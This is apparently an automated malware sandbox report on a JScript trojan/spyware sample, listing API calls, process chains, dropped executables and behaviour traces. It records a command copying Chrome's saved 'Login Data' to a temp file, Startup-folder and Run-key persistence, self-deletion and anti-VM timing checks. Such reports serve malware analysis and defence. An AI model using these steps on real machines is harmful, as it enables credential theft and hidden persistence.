Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399780 NtMapViewOfSection,LdrInitializeThunk, 13_2_04399780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399FE0 NtCreateMutant,LdrInitializeThunk, 13_2_04399FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399820 NtEnumerateKey, 13_2_04399820
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0439B040 NtSuspendThread, 13_2_0439B040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043998A0 NtWriteVirtualMemory, 13_2_043998A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043998F0 NtReadVirtualMemory, 13_2_043998F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0439AD30 NtSetContextThread, 13_2_0439AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399520 NtWaitForSingleObject, 13_2_04399520
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399560 NtWriteFile, 13_2_04399560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399950 NtQueueApcThread, 13_2_04399950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043995F0 NtQueryInformationFile, 13_2_043995F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043999D0 NtCreateProcessEx, 13_2_043999D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399A20 NtResumeThread, 13_2_04399A20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399A10 NtQuerySection, 13_2_04399A10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399A00 NtProtectVirtualMemory, 13_2_04399A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399670 NtQueryInformationProcess, 13_2_04399670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399A80 NtOpenDirectoryObject, 13_2_04399A80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399730 NtQueryVirtualMemory, 13_2_04399730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0439A710 NtOpenProcessToken, 13_2_0439A710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399770 NtSetInformationFile, 13_2_04399770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0439A770 NtOpenThread, 13_2_0439A770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399760 NtOpenProcess, 13_2_04399760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0439A3B0 NtGetContextThread, 13_2_0439A3B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043997A0 NtUnmapViewOfSection, 13_2_043997A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A320 NtCreateFile, 13_2_0041A320
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A3D0 NtReadFile, 13_2_0041A3D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A450 NtClose, 13_2_0041A450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A500 NtAllocateVirtualMemory, 13_2_0041A500
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A31A NtCreateFile, 13_2_0041A31A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A3CA NtReadFile, 13_2_0041A3CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A4FA NtAllocateVirtualMemory, 13_2_0041A4FA
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA3D0 NtReadFile, 23_2_008EA3D0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA320 NtCreateFile, 23_2_008EA320
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA450 NtClose, 23_2_008EA450
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA500 NtAllocateVirtualMemory, 23_2_008EA500
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA3CA NtReadFile, 23_2_008EA3CA
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA31A NtCreateFile, 23_2_008EA31A
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA4FA NtAllocateVirtualMemory, 23_2_008EA4FA
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099910 NtAdjustPrivilegesToken,LdrInitializeThunk, 23_2_01099910
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099860 NtQuerySystemInformation,LdrInitializeThunk, 23_2_01099860
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010995D0 NtClose,LdrInitializeThunk, 23_2_010995D0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099FE0 NtCreateMutant,LdrInitializeThunk, 23_2_01099FE0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099660 NtAllocateVirtualMemory,LdrInitializeThunk, 23_2_01099660
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010996E0 NtFreeVirtualMemory,LdrInitializeThunk, 23_2_010996E0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099950 NtQueueApcThread, 23_2_01099950
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010999A0 NtCreateSection, 23_2_010999A0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010999D0 NtCreateProcessEx, 23_2_010999D0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099820 NtEnumerateKey, 23_2_01099820
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099840 NtDelayExecution, 23_2_01099840
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0109B040 NtSuspendThread, 23_2_0109B040
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010998A0 NtWriteVirtualMemory, 23_2_010998A0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010998F0 NtReadVirtualMemory, 23_2_010998F0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099B00 NtSetValueKey, 23_2_01099B00
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0109A3B0 NtGetContextThread, 23_2_0109A3B0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099A00 NtProtectVirtualMemory, 23_2_01099A00
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099A10 NtQuerySection, 23_2_01099A10
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099A20 NtResumeThread, 23_2_01099A20
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099A50 NtCreateFile, 23_2_01099A50
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099A80 NtOpenDirectoryObject, 23_2_01099A80
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099520 NtWaitForSingleObject, 23_2_01099520
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0109AD30 NtSetContextThread, 23_2_0109AD30
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099540 NtReadFile, 23_2_01099540
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099560 NtWriteFile, 23_2_01099560
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010995F0 NtQueryInformationFile, 23_2_010995F0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099710 NtQueryInformationToken, 23_2_01099710
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0109A710 NtOpenProcessToken, 23_2_0109A710
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099730 NtQueryVirtualMemory, 23_2_01099730
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099760 NtOpenProcess, 23_2_01099760
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099770 NtSetInformationFile, 23_2_01099770
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0109A770 NtOpenThread, 23_2_0109A770
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099780 NtMapViewOfSection, 23_2_01099780
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010997A0 NtUnmapViewOfSection, 23_2_010997A0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099610 NtEnumerateValueKey, 23_2_01099610
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099650 NtQueryValueKey, 23_2_01099650
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099670 NtQueryInformationProcess, 23_2_01099670
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010996D0 NtCreateKey, 23_2_010996D0
Source: oxx7nkdv4g8.exe.4.dr Static PE information: No import functions for PE file found
Source: bin.exe.0.dr Static PE information: No import functions for PE file found
Source: oxx7nkdv4g8.exe0.4.dr Static PE information: No import functions for PE file found
Source: CIQ-PO16266.js Initial sample: Strings found which are bigger than 50
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Clf0t8l5h\oxx7nkdv4g8.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: bin.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: oxx7nkdv4g8.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: oxx7nkdv4g8.exe0.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: oxx7nkdv4g8.exe.4.dr Static PE information: Section .text
Source: bin.exe.0.dr Static PE information: Section .text
Source: oxx7nkdv4g8.exe0.4.dr Static PE information: Section .text
Source: CIQ-PO16266.js Virustotal: Detection: 25%
Source: CIQ-PO16266.js ReversingLabs: Detection: 22%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\CIQ-PO16266.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\wtheeNaAZG.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wtheeNaAZG.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtheeNaAZG.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\wtheeNaAZG.js
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winJS@19/7@40/16
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01
Source: C:\Windows\explorer.exe File created: C:\Program Files (x86)\Clf0t8l5h
Source: explorer.exe, 00000004.00000000.478842715.000000000DF60000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qBS;.VBp
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\explorer.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000003.00000003.451270316.0000000000BE1000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000003.448147583.0000000000A4C000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.577803600.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.578046255.0000000000E9F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.991201290.0000000004330000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.579500120.0000000000D4E000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.991328782.000000000444F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.577535038.0000000000BAF000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000002.891799619.0000000001030000.00000040.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.890212003.0000000000E92000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.888712665.0000000000BD9000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000002.892187528.000000000114F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, bin.exe, 00000003.00000003.451270316.0000000000BE1000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000003.448147583.0000000000A4C000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.577803600.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.578046255.0000000000E9F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000D.00000002.991201290.0000000004330000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.579500120.0000000000D4E000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.991328782.000000000444F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.577535038.0000000000BAF000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, oxx7nkdv4g8.exe, 00000017.00000002.891799619.0000000001030000.00000040.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.890212003.0000000000E92000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.888712665.0000000000BD9000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000002.892187528.000000000114F000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0001C928 push cs; retf 3_2_0001C935
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0001492D push eax; ret 3_2_0001492E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_000272B3 push eax; retf 3_2_000272B4
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002EB3B push dword ptr [7D52CE57h]; ret 3_2_0002EB5E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002D625 push eax; ret 3_2_0002D678
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002D672 push eax; ret 3_2_0002D678
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002D67B push eax; ret 3_2_0002D6E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002D6DC push eax; ret 3_2_0002D6E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DFD0D1 push ecx; ret 3_2_00DFD0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043AD0D1 push ecx; ret 13_2_043AD0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0040C928 push cs; retf 13_2_0040C935
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0040492D push eax; ret 13_2_0040492E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_004172B3 push eax; retf 13_2_004172B4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041EB3B push dword ptr [7D52CE57h]; ret 13_2_0041EB5E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041D672 push eax; ret 13_2_0041D678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041D67B push eax; ret 13_2_0041D6E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041D625 push eax; ret 13_2_0041D678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041D6DC push eax; ret 13_2_0041D6E2
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008D492D push eax; ret 23_2_008D492E
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008DC928 push cs; retf 23_2_008DC935
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008E72B3 push eax; retf 23_2_008E72B4
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EEB3B push dword ptr [7D52CE57h]; ret 23_2_008EEB5E
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008ED6DC push eax; ret 23_2_008ED6E2
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008ED625 push eax; ret 23_2_008ED678
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008ED67B push eax; ret 23_2_008ED6E2
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008ED672 push eax; ret 23_2_008ED678
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010AD0D1 push ecx; ret 23_2_010AD0E4
Source: CIQ-PO16266.js String : entropy: 5.56, length: 330788, content: 'dHJ5ewp2YXIgbG9uZ1RleHQxID0gImRtOXBaQ0FvSVVGeWNtRjVMbkJ5YjNSdmRIbHdaUzVtYjNKRllXTm9JRDhnUVhKeVlYa3V
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe
Source: C:\Windows\explorer.exe File created: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Clf0t8l5h\oxx7nkdv4g8.exe

Boot Survival

Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtheeNaAZG.js
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 0000000000018C04 second address: 0000000000018C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 0000000000018F9E second address: 0000000000018FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000408F9E second address: 0000000000408FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe RDTSC instruction interceptor: First address: 00000000008D8C04 second address: 00000000008D8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe RDTSC instruction interceptor: First address: 00000000008D8F9E second address: 00000000008D8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\explorer.exe TID: 5228 Thread sleep time: -65000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00018ED0 rdtsc 3_2_00018ED0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe API coverage: 2.4 %
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00411660 FindFirstFileW,FindNextFileW,FindClose, 13_2_00411660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00411659 FindFirstFileW,FindNextFileW,FindClose, 13_2_00411659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: explorer.exe, 00000004.00000000.509787707.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: wscript.exe, 00000002.00000003.703744618.0000015597A7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.896475063.0000015597A7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.978866316.0000015597A7D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWr-0000
Source: explorer.exe, 00000004.00000000.510215126.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.509787707.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: wscript.exe, 00000002.00000003.896380234.0000015597A27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.961961202.0000015597A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.703640260.0000015597A27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938835842.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773589121.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: explorer.exe, 00000004.00000000.531590842.0000000006900000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000009.00000003.798380808.000002A0FE306000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.972932842.000002A0FE300000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: wscript.exe, 00000002.00000003.703744618.0000015597A7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.896475063.0000015597A7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.978866316.0000015597A7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.999832531.000002CA05741000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.921517592.000002CA056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.921693056.000002CA05741000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.755502023.000002CA05747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.999768148.000002CA056E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.755213500.000002CA05741000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.920713114.000002CA05747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773959377.0000019175C0F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.510215126.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: wscript.exe, 00000007.00000003.773742708.0000019175BED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938835842.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773589121.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWduia.ro$$
Source: explorer.exe, 00000004.00000000.510215126.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: >C:\Users\user\AppData\Roaming_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
